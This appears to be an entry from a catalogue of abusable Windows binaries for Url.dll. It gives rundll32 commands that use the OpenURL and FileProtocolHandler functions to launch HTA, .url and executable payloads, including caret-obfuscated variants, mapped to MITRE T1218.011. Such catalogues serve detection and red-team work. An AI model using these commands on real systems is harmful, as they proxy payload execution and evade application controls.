Url.dll
Internet Shortcut Shell Extension DLL.
Execute
Invoke an HTML Application via mshta.exe (Default Handler).
rundll32.exe url.dll,OpenURL {PATH_ABSOLUTE:.hta}
Launch a HTML application payload by calling OpenURL. — MITRE: T1218.011 — Privileges: User
Load an executable payload by calling a .url file.
rundll32.exe url.dll,OpenURL {PATH_ABSOLUTE:.url}
Launch an executable payload via proxy through a .url (information) file by calling OpenURL. — MITRE: T1218.011 — Privileges: User
Load an executable payload by specifying the file protocol handler (obfuscated).
rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e
Launch an executable by calling OpenURL. — MITRE: T1218.011 — Privileges: User
Launch an executable.
rundll32.exe url.dll,FileProtocolHandler {PATH_ABSOLUTE:.exe}
Launch an executable by calling FileProtocolHandler. — MITRE: T1218.011 — Privileges: User
Load an executable payload by specifying the file protocol handler (obfuscated).
rundll32.exe url.dll,FileProtocolHandler file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e
Launch an executable by calling FileProtocolHandler. — MITRE: T1218.011 — Privileges: User
Invoke an HTML Application via mshta.exe (Default Handler).
rundll32.exe url.dll,FileProtocolHandler file:///C:/test/test.hta
Launch a HTML application payload by calling FileProtocolHandler. — MITRE: T1218.011 — Privileges: User